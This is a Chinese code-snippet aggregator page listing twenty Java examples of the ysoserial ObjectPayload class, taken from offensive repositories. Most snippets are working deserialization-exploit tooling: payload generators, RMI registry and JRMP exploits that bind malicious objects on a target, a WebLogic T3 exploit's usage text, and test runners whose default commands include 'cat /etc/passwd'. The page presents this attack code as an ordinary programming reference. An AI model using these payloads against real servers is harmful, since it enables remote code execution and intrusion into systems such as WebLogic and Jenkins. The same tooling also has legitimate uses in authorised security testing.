• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

Java ObjectPayload类代码示例

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

本文整理汇总了Java中ysoserial.payloads.ObjectPayload的典型用法代码示例。如果您正苦于以下问题:Java ObjectPayload类的具体用法?Java ObjectPayload怎么用?Java ObjectPayload使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。



ObjectPayload类属于ysoserial.payloads包,在下文中一共展示了ObjectPayload类的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Java代码示例。

示例1: printUsage

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void printUsage() {
System.err.println("Y SO SERIAL?");
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
System.err.println("  Available payload types:");

final List<Class<? extends ObjectPayload>> payloadClasses =
	new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize

      final List<String[]> rows = new LinkedList<String[]>();
      rows.add(new String[] {"Payload", "Authors", "Dependencies"});
      rows.add(new String[] {"-------", "-------", "------------"});
      for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
           rows.add(new String[] {
              payloadClass.getSimpleName(),
              Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
              Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
          });
      }

      final List<String> lines = Strings.formatTable(rows);

      for (String line : lines) {
          System.err.println("     " + line);
      }
  }
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:27,代码来源:GeneratePayload.java


示例2: exploit

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
           Object payload = payloadObj.getObject(command);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
			e.printStackTrace();
		}
		Utils.releasePayload(payloadObj, payload);
		return null;
	}});
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:18,代码来源:RMIRegistryExploit.java


示例3: run

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
	// ensure payload generation doesn't throw an exception
	byte[] serialized = new ExecCheckingSecurityManager().callWrapped(new Callable<byte[]>(){
		public byte[] call() throws Exception {
			final String command = args.length > 0 && args[0] != null ? args[0] : getDefaultTestCmd();

			System.out.println("generating payload object(s) for command: '" + command + "'");

			ObjectPayload<?> payload = clazz.newInstance();
               final Object objBefore = payload.getObject(command);

			System.out.println("serializing payload");
			byte[] ser = Serializer.serialize(objBefore);
			Utils.releasePayload(payload, objBefore);
               return ser;
	}});

	try {
		System.out.println("deserializing payload");
		final Object objAfter = Deserializer.deserialize(serialized);
	} catch (Exception e) {
		e.printStackTrace();
	}

}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:26,代码来源:PayloadRunner.java


示例4: exploit

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
		CmdExecuteHelper cmdHelper = new CmdExecuteHelper("none", command);
           Object payload = payloadObj.getObject(cmdHelper);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
			e.printStackTrace();
		}
		Utils.releasePayload(payloadObj, payload);
		return null;
	}});
}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:19,代码来源:RMIRegistryExploit.java


示例5: exploit

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
           Object payload = payloadObj.getObject(command);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
			e.printStackTrace();
		}
		Utils.releasePayload(payloadObj, payload);
		return null;
	}});
}
 
开发者ID:RickGray,项目名称:ysoserial-plus,代码行数:18,代码来源:RMIRegistryExploit.java


示例6: run

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
	// ensure payload generation doesn't throw an exception
	byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
		public byte[] call() throws Exception {
			final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";

			System.out.println("generating payload object(s) for command: '" + command + "'");

			ObjectPayload<?> payload = clazz.newInstance();
               final Object objBefore = payload.getObject(command);

			System.out.println("serializing payload");
			byte[] ser = Serializer.serialize(objBefore);
			Utils.releasePayload(payload, objBefore);
               return ser;
	}});

	try {
		System.out.println("deserializing payload");
		final Object objAfter = Deserializer.deserialize(serialized);
	} catch (Exception e) {
		e.printStackTrace();
	}

}
 
开发者ID:RickGray,项目名称:ysoserial-plus,代码行数:26,代码来源:PayloadRunner.java


示例7: getExploitPayload

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static byte[] getExploitPayload(String payloadType, String command){

        final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType.split(" ")[0]);

        byte[] exploitPayload = new byte[0];

        try {
            final ObjectPayload payload = payloadClass.newInstance();
            final Object object = payload.getObject(command);
            exploitPayload = Serializer.serialize(object);
        } catch (Throwable e) {
            System.err.println("Error while generating or serializing payload");
            e.printStackTrace();
        }

        return exploitPayload;

    }
 
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:19,代码来源:Utilities.java


示例8: run

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
	// ensure payload generation doesn't throw an exception
	byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
		public byte[] call() throws Exception {
			final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";

			System.out.println("generating payload object(s) for command: '" + command + "'");

			final Object objBefore = clazz.newInstance().getObject(command);

			System.out.println("serializing payload");

			return Serializer.serialize(objBefore);
	}});

	try {
		System.out.println("deserializing payload");
		final Object objAfter = Deserializer.deserialize(serialized);
	} catch (Exception e) {
		e.printStackTrace();
	}

}
 
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:24,代码来源:PayloadRunner.java


示例9: generate

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public Object generate(String type, String command) {
    final Class<? extends ObjectPayload> payloadClass = getPayloadClass(type);

    try {
        ObjectPayload payload = payloadClass.newInstance();
        Object object = payload.getObject(command);
        return object;

    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload.");
        e.printStackTrace();
        System.exit(1);
        return null;
    }

}
 
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:17,代码来源:GeneratePayload.java


示例10: run

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    // ensure payload generation doesn't throw an exception
    byte[] serialized = ExecBlockingSecurityManager.wrap(new Callable<byte[]>(){
        public byte[] call() throws Exception {
            final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";

            System.out.println("generating payload object(s) for command: '" + command + "'");

            final Object objBefore = clazz.newInstance().getObject(command);

            System.out.println("serializing payload");

            return serialize(objBefore);
        }});

    try {
        System.out.println("deserializing payload");
        final Object objAfter = deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }

}
 
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:24,代码来源:PayloadRunner.java


示例11: main

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) {
	if (args.length != 2) {
		printUsage();
		System.exit(USAGE_CODE);
	}
	final String payloadType = args[0];
	final String command = args[1];

	final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
	if (payloadClass == null) {
		System.err.println("Invalid payload type '" + payloadType + "'");
		printUsage();
		System.exit(USAGE_CODE);
		return; // make null analysis happy
	}

	try {
		final ObjectPayload payload = payloadClass.newInstance();
		final Object object = payload.getObject(command);
		PrintStream out = System.out;
		Serializer.serialize(object, out);
		ObjectPayload.Utils.releasePayload(payload, object);
	} catch (Throwable e) {
		System.err.println("Error while generating or serializing payload");
		e.printStackTrace();
		System.exit(INTERNAL_ERROR_CODE);
	}
	System.exit(0);
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:30,代码来源:GeneratePayload.java


示例12: parseObjIdAndExploit

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void parseObjIdAndExploit ( final String[] args, final Class<? extends ObjectPayload> payloadClass, int jrmpPort,
        InetSocketAddress isa, Exception e ) throws Exception, IOException {
    String msg = e.getMessage();
    int start = msg.indexOf("objID:[");
    if ( start < 0 ) {
        throw new Exception("Failed to get object id");
    }

    int sep = msg.indexOf(", ", start + 1);

    if ( sep < 0 ) {
        throw new Exception("Failed to get object id, separator");
    }

    int end = msg.indexOf("]", sep + 1);

    if ( end < 0 ) {
        throw new Exception("Failed to get object id, separator");
    }

    String uid = msg.substring(start + 7, sep);
    String objNum = msg.substring(sep + 2, end);

    System.err.println("* UID is " + uid);
    System.err.println("* ObjNum is " + objNum);

    String[] parts = uid.split(":");

    long obj = Long.parseLong(objNum);
    int o1 = Integer.parseInt(parts[ 0 ], 16);
    long o2 = Long.parseLong(parts[ 1 ], 16);
    short o3 = Short.parseShort(parts[ 2 ], 16);

    exploit(new InetSocketAddress(isa.getAddress(), jrmpPort), obj, o1, o2, o3, payloadClass, args[ 2 ]);
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:36,代码来源:JenkinsListener.java


示例13: main

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) throws Exception {
	final String host = args[0];
	final int port = Integer.parseInt(args[1]);
	final String command = args[3];
	final Registry registry = LocateRegistry.getRegistry(host, port);
	final String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
	final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);

	// ensure payload doesn't detonate during construction or deserialization
	exploit(registry, payloadClass, command);
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:12,代码来源:RMIRegistryExploit.java


示例14: main

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) {
	if (args.length != 3) {
		printUsage();
		System.exit(USAGE_CODE);
	}
	final String payloadType = args[0];
	final String terminalType = args[1];
	final String command = args[2];

	final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
	if (payloadClass == null) {
		System.err.println("Invalid payload type '" + payloadType + "'");
		printUsage();
		System.exit(USAGE_CODE);
		return; // make null analysis happy
	}
	
	if (!terminalTypes.contains(terminalType)) {
		System.err.println("Invalid terminal type '" + terminalType + "'");
		printUsage();
		System.exit(USAGE_CODE);
		return; // make null analysis happy
	}

	try {
		final ObjectPayload payload = payloadClass.newInstance();
		CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
		final Object object = payload.getObject(cmdHelper);
		PrintStream out = System.out;
		Serializer.serialize(object, out);
		ObjectPayload.Utils.releasePayload(payload, object);
	} catch (Throwable e) {
		System.err.println("Error while generating or serializing payload");
		e.printStackTrace();
		System.exit(INTERNAL_ERROR_CODE);
	}
	System.exit(0);
}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:39,代码来源:GeneratePayload.java


示例15: printUsage

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void printUsage() {
	System.err.println("Y SO SERIAL?");
	System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] [terminal type: cmd / bash / powershell / none] '[command to execute]'");
	System.err.println("   ex: java -jar ysoserial-[version]-all.jar CommonsCollections5 bash 'touch /tmp/ysoserial'");
	System.err.println("\tAvailable payload types:");
	final List<Class<? extends ObjectPayload>> payloadClasses =
		new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
	Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
	for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
		System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
	}
}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:13,代码来源:GeneratePayload.java


示例16: run

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
	// ensure payload generation doesn't throw an exception
	byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
		public byte[] call() throws Exception {
			final String command = args.length > 0 && args[0] != null ? args[0] : "cat /etc/passwd > /tmp/seraquefunfou";

			System.out.println("generating payload object(s) for command: '" + command + "'");
			
			CmdExecuteHelper cmdHelper = new CmdExecuteHelper("bash", command);
			
			ObjectPayload<?> payload = clazz.newInstance();
               final Object objBefore = payload.getObject(cmdHelper);

			System.out.println("serializing payload");
			byte[] ser = Serializer.serialize(objBefore);
			Utils.releasePayload(payload, objBefore);
               return ser;
	}});

	try {
		System.out.println("deserializing payload");
		final Object objAfter = Deserializer.deserialize(serialized);
	} catch (Exception e) {
		e.printStackTrace();
	}

}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:28,代码来源:PayloadRunner.java


示例17: usage

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void usage() {
	System.err.println("Usage: WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMD");
	System.err.println("\nOptions:");
	System.err.println("\t--help\t\t\t\tprint usage (you\'re lookin at it)\n");
	System.err.println("\t--verbose\t\t\tVerbose output (full thrown exception output)\n");
	System.err.println("\t--method=EXPLOIT_METHOD\t\tExploit Method for delivering generated ysoserial payload");
	System.err.println("\t\tExploit Methods:\n\t\t\tProperty\tSend ysoserial payload as connection environment property value (Default, via javax.naming.Context.lookup(), similar to JavaUnserializeExploits weblogic.py)");
	System.err.println("\t\t\tBind\t\tSend ysoserial payload as object to bind to name (via javax.naming.Context.bind(), also similar to JavaUnserializeExploits weblogic.py)");
	System.err.println("\t\t\tWLBind\t\tSend ysoserial payload as WebLogic RMI object to bind to name (via weblogic.rmi.Naming.bind(), similar to ysoserial.exploit.RMIRegistryExploit)\n");
	System.err.println("\t--t3s[=PROTOCOL]\t\tUse T3S (transport-encrypted) connection (Disabled by default)");
	System.err.println("\t\tProtocols:\n\t\t\tTLSv1.2\n\t\t\tTLSv1.1\n\t\t\tTLSv1 (Default)\n\t\t\tSSLv3");
	System.err.println("\t\t\tSSLv2 (SSLv2Hello handshake only, then fallback to SSLv3 for communication: this is an Oracle Java limitation, not a tool limitation)\n\n");
	
	//list available ysoserial payload types, or print error on failure
	System.err.println("Available Payload Types (WebLogic is usually vulnerable to \"CommonsCollectionsX\" types):");
	try {
		final List<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
		Collections.sort(payloadClasses, new Strings.ToStringComparator());
		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
			System.err.println("\t"+payloadClass.getSimpleName());
		}
		System.err.println("");
	} catch(NoClassDefFoundError ncdfe) {
		System.err.println("\tNo ysoserial object payload classes found! Ensure that ysoserial jar file is in classpath when executing WLT3Serial!\n");
	} catch(Exception e) {
		System.err.println("\tUnknown Error occurred while listing ysoserial object payload classes ("+e.getClass().getName()+")!");
	}
}
 
开发者ID:Bort-Millipede,项目名称:WLT3Serial,代码行数:29,代码来源:WLT3Serial.java


示例18: printUsage

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void printUsage() {
	System.err.println("Y SO SERIAL?");
	System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
	System.err.println("\tAvailable payload types:");
	final List<Class<? extends ObjectPayload>> payloadClasses =
		new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
	Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
	for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
		System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
	}
}
 
开发者ID:RickGray,项目名称:ysoserial-plus,代码行数:12,代码来源:GeneratePayload.java


示例19: main

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) {
	if (args.length != 2) {
		printUsage();
		System.exit(USAGE_CODE);
	}
	final String payloadType = args[0];
	final String command = args[1];

	final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
	if (payloadClass == null) {
		System.err.println("Invalid payload type '" + payloadType + "'");
		printUsage();
		System.exit(USAGE_CODE);
	}

	try {
		final ObjectPayload payload = payloadClass.newInstance();
		final Object object = payload.getObject(command);
		PrintStream out = System.out;
		Serializer.serialize(object, out);
	} catch (Throwable e) {
		System.err.println("Error while generating or serializing payload");
		e.printStackTrace();
		System.exit(INTERNAL_ERROR_CODE);
	}
	System.exit(0);
}
 
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:28,代码来源:GeneratePayload.java


示例20: getPayloadClass

import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
@SuppressWarnings("unchecked")
private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
    try {
        return (Class<? extends ObjectPayload>) Class.forName(className);
    } catch (Exception e1) {
    }
    try {
        return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName()
                + ".payloads."  + className);
    } catch (Exception e2) {
    }
    return null;
}
 
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:14,代码来源:GeneratePayload.java



注:本文中的ysoserial.payloads.ObjectPayload类示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Java DeserializationException类代码示例发布时间:2022-05-22
下一篇:
Java FlowMappingEndToken类代码示例发布时间:2022-05-22
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap